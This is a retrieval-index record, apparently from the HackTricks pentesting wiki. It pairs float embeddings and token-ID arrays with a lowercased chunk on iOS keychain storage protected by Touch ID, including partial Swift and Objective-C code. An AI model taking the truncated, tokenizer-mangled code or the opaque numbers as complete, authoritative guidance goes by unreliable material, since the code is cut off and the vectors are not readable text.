0.19188039004802704, -0.21406963467597961, -0.4995947480201721, -0.038087498396635056, 0.3148311674594879, -0.23697234690189362, 0.266500324010849, -0.3367141783237457, -0.6669939756393433, 0.3371371626853943, 0.3915870785713196, -0.6062430739402771, -0.5161128640174866, 0.7067376375198364, 0.889186680316925, -0.22931523621082306, 0.3645365536212921, 0.2676093280315399, 0.2443336844444275, 0.658033013343811, -0.4060179889202118, 0.26026707887649536, 0.3397751748561859, -0.6184818744659424, 0.9900824427604675, -0.6648067831993103, 0.8647957444190979, 0.19001683592796326, -0.5741413235664368, -0.046854402869939804, 0.31437191367149353, -0.20803043246269226, -0.14773012697696686, -0.15111231803894043, 0.43272665143013, -0.44352903962135315, 0.08560752868652344, -0.7240352630615234, -1.2776261568069458, 0.4759899377822876, 0.4775392413139343, 1.0200233459472656, 0.14521797001361847, -0.3313058614730835, -0.39273959398269653, -0.020298540592193604, -0.3701435923576355, 0.066533163189888, 1.1168204545974731, -0.24756088852882385, -0.09456618130207062, 0.6269609928131104, 0.42109358310699463, -0.5767815709114075, -0.08137070387601852, -0.540702760219574, -1.1598680019378662, 0.049878768622875214, 0.5180581212043762, 0.6921399235725403, -0.1784966140985489, -0.4640083611011505, 0.4180852770805359, 0.13919290900230408, 0.6311017870903015, -0.06700589507818222, -0.1031750813126564, -0.02499101683497429, 0.6188413500785828 ]
[ 3107, 2227, 8909, 1024, 2029, 4473, 27280, 2241, 2006, 13268, 5038, 1012, 9797, 2031, 2048, 7047, 2005, 13543, 3543, 8909, 1013, 2227, 8909, 27280, 1024, 2334, 4887, 10760, 16778, 10719, 1012, 7705, 2003, 1037, 2152, 1011, 2504, 17928, 2008, 2064, 2022, 2109, 2000, 14469, 3686, 1996, 5310, 3081, 3543, 8909, 1012, 1996, 10439, 2064, 1005, 1056, 3229, 2151, 2951, 3378, 2007, 1996, 8302, 4344, 16550, 1998, 2003, 19488, 2069, 3251, 27280, 2001, 3144, 1012, 3036, 1012, 7705, 2003, 1037, 2896, 2504, 17928, 2000, 3229, 3145, 24925, 2078, 2578, 1012, 2023, 2003, 1037, 5851, 5724, 2065, 2115, 10439, 3791, 2000, 4047, 2070, 3595, 2951, 2007, 16012, 12589, 27280, 1010, 2144, 1996, 3229, 2491, 2003, 3266, 2006, 1037, 2291, 1011, 2504, 1998, 2064, 2025, 4089, 2022, 27539, 1012, 3036, 1012, 7705, 2038, 1037, 1039, 17928, 1010, 2021, 2045, 2024, 2195, 2330, 3120, 10236, 7347, 2800, 1010, 2437, 3229, 2000, 1996, 3145, 24925, 2078, 2004, 3722, 2004, 2000, 24978, 20330, 3207, 7011, 11314, 2015, 1012, 3531, 2022, 5204, 2008, 2478, 2593, 1996, 2334, 4887, 10760, 16778, 10719, 1012, 7705, 2030, 1996, 3036, 1012, 7705, 1010, 2097, 2022, 1037, 2491, 2008, 2064, 2022, 27539, 2011, 2019, 17346, 2004, 2009, 2515, 2069, 2709, 1037, 22017, 20898, 1998, 2053, 2951, 2000, 10838, 2007, 1012, 2156, 2123, 1005, 1056, 3543, 2033, 2008, 2126, 1010, 2011, 2585, 11409, 28001, 3802, 2632, 2005, 2062, 4751, 1012, 2334, 27280, 7705, 24844, 18349, 7347, 2064, 4653, 2019, 27280, 25732, 2011, 16911, 1996, 3853, 16157, 18155, 2594, 2100, 1997, 1996, 18749, 28040, 18413, 2465, 1012, 2048, 2800, 6043, 9375, 11701, 3596, 1997, 27280, 1024, 5080, 12384, 6906, 14317, 4765, 21261, 1006, 9170, 1007, 2030, 5001, 23518, 18124, 7903, 8780, 7962, 6906, 14317, 4765, 21261, 1006, 7863, 1011, 1039, 1007, 1024, 2043, 2800, 1010, 1996, 5310, 2003, 9469, 2000, 4685, 3543, 8909, 27280, 1012, 2065, 3543, 8909, 2003, 2025, 8878, 1010, 1996, 5080, 3413, 16044, 2003, 7303, 2612, 1012, 2065, 1996, 5080, 3413, 16044, 2003, 2025, 9124, 1010, 3343, 9312, 11896, 1012, 5080, 12384, 6906, 14317, 4765, 21261, 24415, 26282, 12589, 2015, 1006, 9170, 1007, 2030, 5001, 23518, 18124, 7903, 8780, 7962, 6906, 14317, 4765, 21261, 24415, 26282, 12589, 2015, 1006, 7863, 1011, 1039, 1007, 1024, 27280, 2003, 7775, 2000, 16012, 12589, 2015, 2073, 1996, 5310, 2003, 9469, 2005, 3543, 8909, 1012, 1996, 16157, 18155, 2594, 2100, 3853, 5651, 1037, 22017, 20898, 3643, 8131, 3251, 1996, 5310, 2038, 14469, 4383, 5147, 1012, 2029, 2965, 2008, 2009, 2064, 2022, 4089, 27539, 1006, 2156, 2917, 1007, 2334, 27280, 2478, 3145, 24925, 3372, 5369, 16380, 3145, 24925, 2078, 17928, 2015, 2064, 1006, 1998, 2323, 1007, 2022, 2109, 2000, 10408, 2334, 27280, 1012, 2076, 2023, 2832, 1010, 1996, 10439, 5324, 2593, 1037, 3595, 27280, 19204, 2030, 2178, 3538, 1997, 3595, 2951, 12151, 1996, 5310, 1999, 1996, 3145, 24925, 2078, 1012, 1999, 2344, 2000, 14469, 3686, 2000, 1037, 6556, 2326, 1010, 1996, 5310, 2442, 19829, 1996, 3145, 24925, 2078, 2478, 2037, 3413, 8458, 23797, 2030, 4344, 16550, 2000, 6855, 1996, 3595, 2951, 1012, 1996, 3145, 24925, 2078, 4473, 7494, 5167, 2007, 1996, 2569, 10819, 6305, 9623, 9363, 3372, 13153, 17961 ]
hack_tricks
43.txt
20
, which will allow access to the item from the keychain only after the user has passed touch id authentication ( or passcode, if such a fallback is allowed by attribute parameters ). in the following example we will save the string " test _ strong _ password " to the keychain. the string can be accessed only on the current device while the passcode is set ( ksecattraccessiblewhenpasscodesetthisdeviceonly parameter ) and after touch id authentication for the currently enrolled fingers only ( secaccesscontrolcreateflags. biometrycurrentset parameter ) : swiftobjective - c / / 1. create accesscontrol object that will represent authentication settingsvar error : unmanaged < cferror >? guard let accesscontrol = secaccesscontrolcreatewithflags ( kcfallocatordefault, ksecattraccessiblewhenpasscodesetthisdeviceonly, secaccesscontrolcreateflags. biometrycurrentset, & error ) else { / / failed to create accesscontrol object return } / / 2. define keychain services query. pay attention that ksecattraccesscontrol is mutually exclusive with ksecattraccessible attributevar query : [ string : any ] = [ : ] query [ ksecclass as string ] = ksecclassgenericpasswordquery [ ksecattrlabel as string ] = " com. me. myapp. password " as cfstringquery [ ksecattraccount as string ] = " owasp account " as cfstringquery [ ksecvaluedata as string ] = " test _ strong _ password ". data ( using :. utf8 )! as cfdataquery [ ksecattraccesscontrol as string ] = accesscontrol / / 3. save itemlet status = secitemadd ( query as cfdictionary, nil ) if status = = noerr { / / successfully saved } else { / / error while saving } / / 1. create accesscontrol object that will represent authentication settings cferrorref * err = nil ; secaccesscontrolref sacref = secaccesscontrolcreatewithflags ( kcfallocatordefault, ksecatt
[ 0.4427631199359894, -0.15519660711288452, 0.06705319881439209, 1.1296393871307373, 0.03240986913442612, 0.426383912563324, -0.3468503952026367, 0.5046828389167786, 0.34838831424713135, 0.6065260767936707, -0.09106148034334183, 0.13602448999881744, -0.07933399081230164, -0.492701917886734, -0.5362643003463745, 0.019392143934965134, -0.12821783125400543, 0.5421539545059204, -0.1524609476327896, 0.09406080096960068, 0.4459061622619629, 0.3558482825756073, -0.8340657353401184, -0.6124094128608704, -0.3318738341331482, 0.9685550332069397, 0.1969612091779709, 0.2898501455783844, 0.3146199584007263, 0.5098548531532288, 0.0033470583148300648, -0.24963197112083435, 0.019303444772958755, -0.37305963039398193, -0.35094380378723145, -0.4604988992214203, 0.7749531269073486, -0.30439111590385437, -0.37162333726882935, -0.14702312648296356, 0.1671166718006134, 0.022566841915249825, 0.18646232783794403, -0.4862363040447235, -0.8163474202156067, -0.44428345561027527, 0.30926746129989624, -0.3387488126754761, 0.0016705566085875034, -0.44753149151802063, 0.13873718678951263, 0.1613720953464508, -0.4396979808807373, 0.1831953376531601, 0.4245193600654602, 0.17188964784145355, 0.16615498065948486, -0.3700906038284302, -0.1768529713153839, 0.6431713700294495, 0.0020553849171847105, 0.4306308627128601, 0.3625081479549408, -0.7156700491905212, 0.0530506856739521, -0.21227332949638367, 0.01663893088698387, -0.23628777265548706, -0.5139180421829224, -0.8433729410171509, 0.19641874730587006, 0.2340892255306244, -0.30750390887260437, -0.8745869994163513, -0.48412492871284485, -0.15670815110206604, 0.040378957986831665, 0.1248873621225357, -0.11894040554761887, 0.3566642105579376, 0.004199086222797632, 0.44058024883270264, 0.27307751774787903, -0.7573058605194092, -0.07766679674386978, 0.23940476775169373, 0.03110065869987011, 0.6589418649673462, -0.4030597507953644, -0.3017219305038452, 0.2281358540058136, 0.35956379771232605, -0.6416199803352356, -0.34685954451560974, 0.6803910136222839, 0.1182759627699852, -0.4682559370994568, -0.12697376310825348, 0.1999017596244812, -0.20548714697360992, 0.25418946146965027, -0.24331477284431458, -0.009086462669074535, 0.7216528654098511, 0.22707012295722961, 1.1636059284210205, 0.7868406772613525, -0.061030566692352295, -0.4861983060836792, -0.6451911330223083, 0.19451536238193512, -0.7006169557571411, 0.12422586232423782, -0.2605668306350708, -0.6185669302940369, 0.523922860622406, 0.4905720055103302, 0.7782086730003357, 0.08770456165075302, 0.7666493654251099, 0.3509488105773926, 0.13089075684547424, 0.7087432146072388, 0.30037549138069153, 0.3512174189090729, 0.006551901809871197, 1.0649604797363281, -0.06842843443155289, -0.3516247570514679, -0.4758147597312927, -0.21402153372764587, 0.4030746519565582, 0.18281571567058563, 0.7814511060714722, -0.6400579810142517, 0.1317298263311386, 0.25390177965164185, 0.11445359885692596, 0.5320373773574829, -0.7560185790061951, -0.08837634325027466, 0.9208172559738159, 0.39990168809890747, 1.0781880617141724, 0.7051099538803101, -0.7160188555717468, -0.37867021560668945, -0.3891996443271637, -0.5459140539169312, 0.5645754337310791, 0.027130523696541786, 0.4848710894584656, 0.28215092420578003, -0.05617184937000275, 0.07278621196746826, -0.09082233160734177, -0.8277748823165894, 0.36132317781448364, -0.261782169342041, 0.06710818409919739, -0.5541082620620728, 1.2539445161819458, -0.0978710800409317, 0.5194842219352722, -0.2137714922428131, 0.06503543257713318, -0.22827407717704773, -0.12874449789524078, -0.35291793942451477, -0.15444962680339813, 0.1994190216064453, 0.380438894033432, 0.32587361335754395, -0.081992007791996, 0.5934718251228333, 0.6468005776405334, 0.07016807794570923, 0.15283696353435516, 0.6623949408531189, 0.35942453145980835, -0.26136156916618347, 0.04781396687030792, 0.5066287517547607, 1.5522068738937378, -0.15178915858268738, 0.07312552630901337, -0.6601099967956543, -0.2809525430202484, 0.22811521589756012, -0.18215098977088928, -0.6064897775650024, 0.2826390862464905, -0.37126654386520386, 0.4703845977783203, 0.3204030990600586, -0.04660743847489357, -1.0479307174682617, -0.3863086998462677, -0.2872450649738312, -1.2718747854232788, -0.2700924575328827, -0.06168592721223831, 0.20030055940151215, 0.3729908764362335, -0.47262829542160034, -0.10441331565380096, 1.191151738166809, 0.3536794185638428, -0.46100643277168274, 0.7882108688354492, 0.3798843324184418, -0.28010493516921997, -0.31751012802124023, -0.154399573802948, 0.20277468860149384, -0.5764466524124146, -0.37608852982521057, 0.9699999690055847, -0.23954932391643524, 0.21667665243148804, -0.21180427074432373, 0.20994243025779724, 0.7117413878440857, 0.5446411371231079, -0.1949862688779831, 0.07912413030862808, 0.4286098778247833, 0.49090105295181274, -0.1810556799173355, -0.22090603411197662, 0.33702969551086426, 0.9880504608154297, 0.9613427519798279, 1.0307884216308594, 0.38999831676483154, 0.15497221052646637, -0.5808315873146057, -0.004319522529840469, 0.9969322085380554, 0.1604030877351761, -0.13630811870098114, 0.36782506108283997, 0.46187183260917664, 0.471569299697876, 0.25789499282836914, -0.2971344292163849, 0.07922843843698502, -0.0644252821803093, 0.8227523565292358, -0.35841965675354004, -0.24577569961547852, 0.8635493516921997, 0.29709744453430176, -0.23871511220932007, -1.1168533563613892, -0.2233576774597168, 0.7293102741241455, 0.6625337600708008, -0.7762333750724792, -0.44760099053382874, 0.14338503777980804, 0.2816430628299713, -0.11769600957632065, -0.003427974646911025, -0.37634143233299255, 0.5388901233673096, -0.06528255343437195, 0.3569198548793793, -0.43913665413856506, -0.13242898881435394, -0.8293760418891907, -0.3006114363670349, -0.6193501353263855, -0.6438221335411072, -0.6573618054389954, 0.17117293179035187, 0.18428075313568115, -0.20577549934387207, 0.7858588695526123, -1.13712477684021, -0.2306046485900879, -0.12363287806510925, 0.1873493492603302, 0.5782049894332886, 0.10377497225999832, 0.2451855093240738, -0.7006760239601135, 0.4068441390991211, 0.1373956799507141, 0.7722615003585815, -0.35291218757629395, -0.11813978850841522, 0.17805925011634827, -0.540489912033081, 0.10334736108779907, -1.1177986860275269, 0.42935577034950256, 0.297131210565567, -0.285449355840683, -0.05544757843017578, 0.31360843777656555, 0.2990112006664276, 0.28178951144218445, 0.0551910400390625, -1.000498652458191, 0.49447211623191833, -0.04500526189804077, -0.20941950380802155, 0.3598509430885315, 0.5745923519134521, -0.22252313792705536, 0.6439455151557922, 0.41978663206100464, -0.0019946724642068148, -0.7987386584281921, 0.8266329765319824, 0.9457691311836243, -0.24014581739902496, -0.005786058958619833, -0.3969608247280121, -0.7912330627441406, -0.05222516879439354, -0.3833349943161011, -0.3173759877681732, 0.2523968815803528, -0.17287544906139374, -0.4124588668346405, -0.6225502490997314, 0.05512876436114311, -0.7280693650245667, -0.6340630650520325, -0.29574400186538696, -0.14644140005111694, 0.6488245129585266, -0.19737820327281952, -0.005072916857898235, 0.43364134430885315, -0.9035861492156982, 0.8637903332710266, 0.4302944540977478, -0.001489911344833672, -0.3436603248119354, 0.46525004506111145, 0.17002131044864655, -0.20745371282100677, 0.6512203812599182, -0.0017804352100938559, -0.29883041977882385, -0.4917105734348297, -0.0776391476392746, -0.45979318022727966, -0.20002371072769165, 0.24043188989162445, 0.16274365782737732, 0.6199925541877747, 0.8294857144355774, -0.07909415662288666, -0.051791202276945114, -0.06556808948516846, 0.44396281242370605, -0.32771217823028564, -0.34683895111083984, 0.389621764421463, 0.5152936577796936, -0.20034407079219818, -0.6724504828453064, -0.40637633204460144, 0.8146160840988159, 0.49121326208114624, -0.17278003692626953, 0.5072693824768066, 0.0408129058778286, 0.1312890648841858, 0.4990929067134857, -0.16245749592781067, -0.5478306412696838, 0.5816490650177002, 0.0952129065990448, 0.4535081684589386, -0.07638218998908997, 0.24775291979312897, 0.30358996987342834, 0.6112823486328125, 0.5332484841346741, 0.7404907941818237, -0.5131357312202454, -0.7699857950210571, 0.20948562026023865, 0.007673744112253189, -0.40713751316070557, 0.41312175989151, 0.06914723664522171, 0.23376484215259552, -0.4234927296638489, -0.6722683310508728, -0.523380696773529, -0.24017789959907532, 0.2092154175043106, 0.5015925168991089, 0.4035773277282715, 0.3860452473163605, 0.5705974102020264, -0.4491148591041565, 0.4666140079498291, -0.9723878502845764, 0.18483808636665344, -0.6810829043388367, 0.5683387517929077, -0.2365036904811859, 0.11382592469453812, -0.44301894307136536, -0.1556873768568039, -0.5173435807228088, -0.1580883115530014, 0.20746967196464539, 0.4728361666202545, -0.4797235429286957, -0.08079700917005539, 0.31282106041908264, 0.32676219940185547, -1.0687639713287354, -0.8209831714630127, -0.21450933814048767, 0.28683188557624817, 0.819635808467865, -0.37985163927078247, -0.14523038268089294, -0.7661305665969849, -0.5093255043029785, -0.21176911890506744, -0.5168725252151489, -0.42377719283103943, -0.6710813641548157, -0.2325478047132492, -0.6480967998504639, -0.09345059096813202, 0.29816704988479614, 0.19498352706432343, 0.014461941085755825, -1.026655912399292, 0.10849267989397049, 0.4966621398925781, -0.5368741750717163, -0.8384250402450562, -0.1901121437549591, 0.7759831547737122, 0.0707765519618988, 0.8172744512557983, -0.1273575723171234, -0.4142937660217285, 0.391618013381958, -0.8476717472076416, 0.6849637627601624, -0.183499276638031, -0.5452289581298828, -0.09639397263526917, 0.40654969215393066, 0.04036896675825119, 0.26215866208076477, -0.635365903377533, 0.3796955943107605, 0.05513042211532593, 0.29332125186920166, 0.1488780528306961, -0.4110454022884369, 0.9744042754173279, -0.643700897693634, -0.5750454664230347, 0.2992759644985199, 0.3334016799926758, 0.09304038435220718, -0.056408610194921494, -0.617085337638855, -0.7151052951812744, 0.5556637048721313, -0.3987080752849579, 0.6772650480270386, -0.2093333601951599, 0.18541811406612396, -0.2374555766582489, -0.29225629568099976, 0.7728858590126038, 0.054643988609313965, 0.4010913670063019, -0.9463997483253479, -0.4079814851284027, -0.1293984353542328, 0.1440696120262146, 0.10656283795833588, 0.40977922081947327, 0.3921710252761841, -0.4401412308216095, -0.3257054388523102, 0.07284561544656754, -0.8682391047477722, 0.06595766544342041, -0.6698119640350342, 0.09375213086605072, -0.15279650688171387, 0.17359459400177002, 0.19651919603347778, 0.1019546389579773, -0.8508135080337524, 0.6554526090621948, -0.2540495693683624, 0.37863537669181824, -0.5974923372268677, -0.43333569169044495, -0.7695476412773132, -0.1737692505121231, 0.1361485719680786, 0.6108986735343933, -0.46633797883987427, 0.19000741839408875, 0.3295036256313324, 0.5235967040061951, -0.02101394720375538, 0.37762051820755005, -0.21756044030189514, 0.4448307454586029, 0.6343836188316345, -0.3333585560321808, -0.2620477080345154, 0.7712209820747375, 0.028728140518069267, 0.661077618598938, -0.5820146203041077, -0.23550227284431458, -0.8020946979522705, -0.6081821918487549, -0.09260159730911255, -0.13408367335796356, 0.5448124408721924, -0.6923947334289551, -0.1390688121318817, 0.017614034935832024, 0.11907626688480377, -0.19839869439601898, -0.7667835354804993, 0.01251150667667389, -0.17621634900569916, 0.2541070878505707, 0.4046066105365753, 0.14420434832572937, -0.36299189925193787, -0.332643985748291, -0.15849824249744415, 0.08134349435567856, 0.37864506244659424, -0.23784632980823517, 0.3206031024456024, -0.0711963102221489, 0.05729271471500397, -0.15174265205860138, -0.39335548877716064, -0.5802639126777649, -0.11056964099407196, 0.6506630182266235, -0.2567563056945801, 0.5882030725479126, -0.659852147102356, 0.2565310299396515, -0.26429399847984314, 0.31257137656211853, -0.17920832335948944, -0.19407065212726593, -0.22717958688735962, 0.664995014667511, 0.5960605144500732, -0.6131859421730042, -0.1018485426902771, -0.0623653307557106, 0.04324539005756378, -0.03991665691137314, 0.2059735506772995, -0.8262990117073059, 0.6857880353927612, -0.7750284671783447, -1.6866968870162964, 0.3592342734336853, 0.14739754796028137, 0.25114569067955017, -0.23506486415863037, -0.2886529862880707, 0.41007882356643677, -0.07988879829645157, 0.0382767990231514, 1.1734977960586548, -0.02346397191286087, 0.06581584364175797, -0.10946764796972275, 0.34727972745895386, 0.5698336958885193, -0.05264795571565628, 0.08971676230430603, -0.21126215159893036, -0.15558788180351257, 0.08765577524900436, -0.44415733218193054, 0.083049476146698, -0.25129327178001404, -0.23853550851345062, -0.03315506875514984, -0.1687733232975006, 0.6512419581413269, -0.2765022814273834, -0.6266788840293884, 0.08021166920661926, 0.26993972063064575, 0.2945105731487274, 0.07146937400102615, 0.13882695138454437, 0.45510193705558777, -0.7228009700775146, -0.7403743863105774, 0.04770616069436073, 0.0619068518280983, -0.18706932663917542, 0.6716448068618774, 0.358591228723526, -0.18128789961338043, 0.7462517619132996, 0.34193527698516846, -0.27954044938087463, -0.31270697712898254, -0.19938749074935913, -0.403055876493454, 0.4477453827857971, -0.4880284070968628, -0.13114570081233978, 0.3669913709163666, -0.1693771332502365, -0.08303605765104294, 0.10338715463876724, 0.13872015476226807, 0.09491808712482452, -0.810913622379303, 0.17051997780799866, -0.80943763256073, -0.10338035970926285, 0.7406578660011292, -0.5292827486991882, -0.3724505305290222, -0.6024730801582336, 0.14262425899505615, 0.2421720176935196, -0.20431892573833466, 0.5667398571968079, 0.135908842086792, -0.20122778415679932, -0.17706671357154846, -0.4636201858520508, 0.9816111326217651, 0.08007626980543137, 0.08959372341632843, 1.1806117296218872, 0.013379453681409359, -0.31806614995002747, -0.04719473049044609, 0.2691152095794678, -0.4598553776741028, -0.3338993787765503, -0.9708395004272461, -0.03978276997804642, -0.027816656976938248, 0.3502541184425354, -0.10763238370418549, -0.34852513670921326, -0.3409879207611084, -1.160339593887329, 0.10148746520280838, 0.023973338305950165, -0.4265701174736023, -0.37367868423461914, 0.827743411064148, 0.2850843369960785, 0.3718559741973877, 0.12977363169193268, 0.5533243417739868, -0.5939748287200928, -0.17843516170978546, -0.4764271378517151, 0.4190453588962555, -0.4909643232822418, -0.8181408047676086, -0.5021483302116394, -0.2813814580440521, -0.3806265890598297, -1.008733868598938, -0.6773667931556702, 0.3308718502521515, -0.3397308588027954, 0.17973244190216064, -0.9548459649085999, 0.1586790829896927, -0.40726232528686523, -0.660521388053894, 0.2686452865600586, 0.6271078586578369, -0.4482754170894623, -0.48576095700263977, 0.43157079815864563, 0.17676272988319397, 0.5253472328186035, -0.370795339345932, -0.24673685431480408, -0.3084035813808441, 0.2045845091342926, 0.38539618253707886, 0.41400137543678284, -0.2853926122188568, 0.04222513735294342, -0.5898563861846924, -0.4879695177078247, -0.05087960511445999, -0.6981146931648254, -0.2640034556388855, 0.4097704291343689, -0.21068908274173737, 0.25115489959716797, -0.002016501734033227, 0.855838418006897, 0.512814998626709, -0.06981883943080902, 0.7284190654754639, 0.9858997464179993, -0.08462030440568924, 0.21684390306472778, 0.14404340088367462, -0.01662444695830345, -0.7372820377349854, 0.13793233036994934, -0.5084963440895081, -0.6120275855064392, 0.5254026055335999, 0.2506199777126312, -0.23642858862876892, -0.3517547845840454, -0.2879904806613922, 0.4198818802833557, 0.4017043709754944, 0.20657482743263245, 0.02507041208446026, 0.2880798578262329, -0.06592170149087906, -0.49447503685951233, -0.12160149961709976, -1.0284827947616577, -0.4661712050437927, -0.11711647361516953, 0.04305234178900719, -0.6502017378807068, -0.2245158851146698, 0.22150874137878418, -0.011361283250153065, 0.14594782888889313, 0.12183398753404617, 0.08930448442697525, -0.3346526026725769, 0.08235783874988556, 0.7147254943847656, -0.4789706766605377, -0.4616989195346832, 0.04556472972035408, 0.9427069425582886, -0.9400972723960876, -1.1384626626968384, 0.5251911878585815, 0.8139487504959106, 0.5095281004905701, 0.04631445184350014, -0.6947007179260254, 0.10171343386173248, 1.0318094491958618, -0.05164047330617905, 0.02708115614950657, -0.09181240946054459, -1.322053074836731, -0.024288127198815346, -0.43058812618255615, 0.23979327082633972, -0.06355801969766617, -0.18637534976005554, -0.11632880568504333, -0.13873180747032166, -0.9713960886001587, 0.18486791849136353, -0.292507529258728, -0.44846731424331665, 0.8555447459220886, 0.2013421356678009, -0.07363047450780869, -0.27611270546913147, -0.02648390829563141, -0.5603150129318237, 0.9471727013587952, 0.49546313285827637, 0.06688275933265686, -0.20813481509685516, -0.09482304751873016, 0.37146565318107605, -0.006281694397330284, 0.22609777748584747, 0.5646712183952332, 0.15928873419761658, -0.19138848781585693, 0.7110097408294678, -0.08885296434164047, 0.12757079303264618, -0.42483484745025635, -0.21073436737060547, -0.23785926401615143, 0.48305872082710266, -0.22537174820899963, -0.10895930230617523, -0.48984143137931824, 0.27088239789009094, -0.7281926870346069, 0.4344283640384674, 0.05736856907606125, -0.2344391793012619, 0.32008105516433716, -0.48207056522369385, -0.9667835831642151, 0.585121750831604, 0.8374952673912048, 0.3339621126651764, 0.12495602667331696, 0.6438436508178711, -0.8528453707695007, -0.29513853788375854, 0.3737613558769226, 0.007043691352009773, -0.5047507286071777, 0.34530454874038696, -0.04815681278705597, -0.5301880240440369, -0.5077083706855774, 0.146070197224617, 0.2355595827102661, 0.08241050690412521, 0.19544650614261627, 0.03085167147219181, 0.3609158396720886, 0.1904394030570984, 0.42142993211746216, -0.2790369391441345, -0.2500920593738556, 0.26054975390434265, -0.13132883608341217, -1.1732584238052368, 0.8847700357437134, -0.2860628068447113, 0.5281847715377808, 0.21990223228931427, 0.30759570002555847, -0.15473610162734985, 0.5739657878875732, 0.24037231504917145, -0.3005950450897217, -0.21702897548675537, 0.21003977954387665, -0.6266394853591919, -0.08021895587444305, 0.26371634006500244, 0.062145717442035675, 0.3697966933250427, -0.6486305594444275, 0.11800459772348404, -0.5609243512153625, -0.2666438817977905, 0.06739606708288193, -0.5121344923973083, 0.5692296028137207, -0.4569770395755768, -0.8883309364318848, 0.40395817160606384, -0.06650602072477341, 0.10643438994884491, 0.507841169834137, -0.5387992858886719, -0.4582115411758423, -0.17727534472942352, -0.10969480127096176, -0.4552810788154602, 0.8588226437568665, 0.26490700244903564, -0.4611695110797882, 0.23549985885620117, -0.926117479801178, -0.2888472378253937, 0.11271577328443527, -0.20529237389564514, -0.15801870822906494, 0.21651986241340637, 0.4577398896217346, 0.782196581363678, 0.1731148213148117, -0.08267271518707275, -0.31648188829421997, 0.1518605351448059, 0.44470277428627014, -0.6326636075973511, 0.9219195246696472, 0.5435606241226196, 0.20294469594955444, 0.6775874495506287, -0.2226022630929947, 0.5236225128173828, -0.8147804737091064, -0.4340052902698517, -0.4736254811286926, -0.038425326347351074, -0.5255933403968811, -0.2609586715698242, -0.19505511224269867, -0.3313347101211548, -0.5554295182228088, -0.40148600935935974, -0.5623758435249329, -0.06592819839715958, -0.5265108942985535, 0.27928638458251953, -0.0649019330739975, 0.04917445033788681, 0.233091801404953, 0.059660933911800385, 0.8632716536521912, -1.601072072982788, 4.522329807281494, 0.43759050965309143, -0.12929314374923706, 0.2774796783924103, 0.021267378702759743, 0.7366921305656433, 1.1956396102905273, 0.010331010445952415, -0.09093289822340012, 0.055294301360845566, -0.16637292504310608, -0.2981565296649933, 0.24058741331100464, -0.16297082602977753, -0.027335643768310547, 0.03805190697312355, -0.6662644147872925, 0.08031487464904785, 0.26998624205589294, -1.3041577339172363, -0.8122649192810059, -0.22798100113868713, -0.1015959233045578, 0.8900673985481262, 0.4788103699684143, 0.11842582374811172, -0.5242995023727417, -0.21606791019439697, -0.5554825067520142, 0.5055356025695801, 0.3608280420303345, -0.03512561693787575, 0.5738155841827393, -0.5264571905136108, -0.5704557299613953, 0.4714336097240448, 0.921830952167511, -0.1803458034992218, -0.7504851222038269, -0.1455756425857544, 0.5416489243507385, 0.027009617537260056, -0.015616504475474358, -0.5602168440818787, 0.02048593759536743, 0.5403117537498474, 0.07621477544307709, 0.3996153771877289, 0.24079212546348572, -0.6120085716247559, 0.8067098259925842, -0.47457244992256165, 0.6626006960868835, -0.49749478697776794, -0.4854086935520172, 0.22652456164360046, 0.20717668533325195, -0.29295167326927185, -0.035377342253923416, -0.0809665098786354, 0.33199310302734375, -0.3935214579105377, 0.3094610273838043, -0.5665855407714844, -0.9602349400520325, 0.22103942930698395, 0.28946301341056824, 0.6654702425003052, -0.034810710698366165, -0.7286065816879272, -0.45702454447746277, -0.859181821346283, -0.3685627281665802, -0.44208860397338867, 0.6637314558029175, -0.4820219874382019, -0.08310706913471222, 0.7690381407737732, 0.8377951979637146, -0.4020804464817047, 0.11945737153291702, -0.18473102152347565, -0.9201837778091431, -0.3251127600669861, 0.4912194311618805, 0.6003451347351074, -0.30443403124809265, -0.30125245451927185, 0.5663248300552368, 0.34232455492019653, 0.6744829416275024, 0.4571881592273712, -0.282694548368454, -0.12534691393375397, 0.4385991394519806 ]
[ 1010, 2029, 2097, 3499, 3229, 2000, 1996, 8875, 2013, 1996, 3145, 24925, 2078, 2069, 2044, 1996, 5310, 2038, 2979, 3543, 8909, 27280, 1006, 2030, 3413, 16044, 1010, 2065, 2107, 1037, 2991, 5963, 2003, 3039, 2011, 17961, 11709, 1007, 1012, 1999, 1996, 2206, 2742, 2057, 2097, 3828, 1996, 5164, 1000, 3231, 1035, 2844, 1035, 20786, 1000, 2000, 1996, 3145, 24925, 2078, 1012, 1996, 5164, 2064, 2022, 11570, 2069, 2006, 1996, 2783, 5080, 2096, 1996, 3413, 16044, 2003, 2275, 1006, 29535, 19281, 4779, 22648, 9623, 19307, 2860, 10222, 15194, 23237, 6582, 24158, 24844, 6610, 2239, 2135, 16381, 1007, 1998, 2044, 3543, 8909, 27280, 2005, 1996, 2747, 8302, 3093, 2069, 1006, 10819, 6305, 9623, 9363, 3372, 13153, 16748, 3686, 10258, 26454, 1012, 16012, 24327, 10841, 14343, 7666, 3388, 16381, 1007, 1024, 9170, 16429, 20614, 3512, 1011, 1039, 1013, 1013, 1015, 1012, 3443, 3229, 8663, 13181, 2140, 4874, 2008, 2097, 5050, 27280, 10906, 10755, 7561, 1024, 4895, 24805, 5999, 1026, 12935, 2121, 29165, 1028, 1029, 3457, 2292, 3229, 8663, 13181, 2140, 1027, 10819, 6305, 9623, 9363, 3372, 13153, 16748, 3686, 24415, 10258, 26454, 1006, 21117, 13976, 24755, 4263, 3207, 7011, 11314, 1010, 29535, 19281, 4779, 22648, 9623, 19307, 2860, 10222, 15194, 23237, 6582, 24158, 24844, 6610, 2239, 2135, 1010, 10819, 6305, 9623, 9363, 3372, 13153, 16748, 3686, 10258, 26454, 1012, 16012, 24327, 10841, 14343, 7666, 3388, 1010, 1004, 7561, 1007, 2842, 1063, 1013, 1013, 3478, 2000, 3443, 3229, 8663, 13181, 2140, 4874, 2709, 1065, 1013, 1013, 1016, 1012, 9375, 3145, 24925, 2078, 2578, 23032, 1012, 3477, 3086, 2008, 29535, 19281, 4779, 22648, 9623, 9363, 3372, 13153, 2003, 20271, 7262, 2007, 29535, 19281, 4779, 22648, 9623, 19307, 17961, 10755, 23032, 1024, 1031, 5164, 1024, 2151, 1033, 1027, 1031, 1024, 1033, 23032, 1031, 29535, 8586, 26266, 2004, 5164, 1033, 1027, 29535, 8586, 26266, 6914, 22420, 15194, 18351, 4226, 2854, 1031, 29535, 19281, 4779, 12190, 16336, 2140, 2004, 5164, 1033, 1027, 1000, 4012, 1012, 2033, 1012, 2026, 29098, 1012, 20786, 1000, 2004, 12935, 3367, 4892, 4226, 2854, 1031, 29535, 19281, 4779, 22648, 3597, 16671, 2004, 5164, 